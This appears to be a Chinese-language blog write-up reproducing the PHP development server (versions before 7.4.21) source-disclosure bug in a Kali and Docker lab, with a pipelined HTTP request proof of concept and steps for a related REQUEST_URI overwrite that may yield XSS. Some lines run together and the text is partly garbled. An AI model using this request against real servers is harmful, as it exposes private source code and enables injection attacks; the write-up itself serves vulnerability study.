PHP 7.4.21 development server 源码泄露漏洞复现

原漏洞地址：https://blog.projectdiscovery.io/php-http-server-source-disclosure/

版本：PHP<7.4.21

漏洞成因：

通过：PHP -s 开启的内置web服务器存在源码泄露漏洞，可以将PHP文件作为静态代码直接输出源码 

POC：

GET /phpinfo.php HTTP/1.1  //这里的phpinfo.php必须是存在的文件，也就是要读取源码的文件
Host: 192.168.xxx.xxx:xxGET / HTTP/1.1 

漏洞复现：

kali虚拟机下载dockerapt-get install docker.io
启动dockerservice docker start
docker拉取PHP 7.4.21的镜像docker pull php:7.4.21 
运行镜像 将docker 的80端口映射到kali的8080端口docker run -it -p 8080:80  4ad229e4e700  /bin/bash
创建phpinfo.phpecho "<?php phpinfo();?>" > phpinfo.php
启动php web serverphp -S 0.0.0.0:80
访问192.168.xxx.xxx:8080 //kali的地址ok开始抓包,发送到repeater模块PS:一定能要关闭自动更新Content-Length

然后写入payload

REQUEST_URL覆盖

在php＜= 7 . 4 . 21 development server源码泄露漏洞中还提到了一个历史漏洞:在解析HTTP请求的过程中，当某些回调被多次调用的时候，$_SERVER[‘REQUEST_URL’]变量回被自身的一个子串覆盖。

这个漏洞没有太大的危害，但是有时候可能会导致XSS

首先

用python生成长度为500的随机字符串

import random
import string def get_random_string(length):return ''.join(random.choice(string.ascii_letters) for _ in range(length))

我们在访问的文件？后面多次粘贴这个字符串，然后多次发包

本来响应的链接中的应该是以/文件名开头的，最后却变成

然后我们将响应包中的字符串放到请求包中搜索，删除最后一个匹配结果

然后多次重放（发包），最后可能会有一次造成XSS注入攻击